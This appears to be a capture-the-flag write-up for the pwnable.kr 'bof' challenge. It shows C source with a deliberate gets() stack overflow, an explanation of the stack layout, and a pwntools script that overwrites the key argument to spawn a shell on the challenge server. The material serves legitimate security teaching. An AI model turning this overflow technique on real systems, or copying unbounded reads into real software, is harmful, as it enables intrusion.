bof
{"author": ["ret2basic"]}

Source Code

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Challenge function: reads one line into a 32-byte stack buffer and spawns
 * a shell only when the `key` argument equals 0xcafebabe.
 *
 * gets() has no length limit, so a line longer than the buffer keeps writing
 * upward through the stack frame: past the saved EBP and the return address
 * and into func's own `key` argument (at ebp + 0x8 on this 32-bit build, see
 * Solution below). The comparison runs *before* func returns, so a caller
 * that corrupts `key` reaches system("/bin/sh") even if the return address
 * has been overwritten with garbage.
 */
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme); // smash me!  -- unbounded read; this is the bug being exploited
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
/*
 * Entry point: calls func() with a key that deliberately does not match
 * 0xcafebabe, so the only path to the shell is corrupting `key` on the stack
 * through the gets() overflow in func().
 */
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

Solution

The objective is to overwrite func's `key` argument. On this 32-bit (cdecl) binary the caller pushes the argument before the call, so inside func it sits at ebp + 0x8, just above the saved EBP (ebp) and the return address (ebp + 0x4). Because `key` is compared before func returns, the return address can be clobbered with junk — system("/bin/sh") runs first. Counting upward from the start of overflowme, the stack looks like this:
buffer (overflowme[32]) + stack slack + saved EBP   <- 48 bytes of "A" (the 48 is measured on the challenge binary, not derivable from the 32-byte declaration alone)
return address (EIP)                                 <- 4 bytes of "B"; harmless, never used
arg (key) at ebp + 0x8                               <- 0xcafebabe

Exploit

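#!/usr/bin/env python3
"""pwnable.kr "bof": overflow func()'s 32-byte stack buffer to rewrite its `key` argument.

gets() reads an unbounded line into overflowme[32]; the bytes that run past the
buffer land on the saved EBP, the return address and then func's first argument
(`key`, at ebp + 0x8). func compares key with 0xcafebabe *before* it returns, so
the return address may hold garbage and system("/bin/sh") is still reached.

Run with no arguments to attack pwnable.kr:9000. Run with ``LOCAL=1`` (pwntools
``args``) to drive a ./bof binary in the working directory instead.
"""
from pwn import *

#--------Setup--------#

# 32-bit target: flat() must pack 0xcafebabe as a 4-byte little-endian word.
context(arch="i386", os="linux")

host = "pwnable.kr"
port = 9000

#--------Overwrite--------#

# Bytes from the start of overflowme to the saved return address. The buffer
# itself is only 32 bytes; the remaining 16 are stack slack below ebp plus the
# saved EBP. This is a property of the challenge binary's frame layout, not of
# the C source - re-measure in a debugger if the binary is rebuilt.
offset = 48

payload = flat(
    b"A" * offset,
    b"B" * 4,     # return address (EIP): clobbered but never used, system() runs first
    0xcafebabe,   # key (ebp + 0x8): the value func() actually compares
)

# Only a local run needs the binary; the remote attack must not fail just
# because ./bof is absent from the working directory.
if args.LOCAL:
    elf = ELF("bof", checksec=False)
    r = elf.process()
else:
    r = remote(host, port)

r.sendline(payload)  # gets() consumes everything up to the newline
r.interactive()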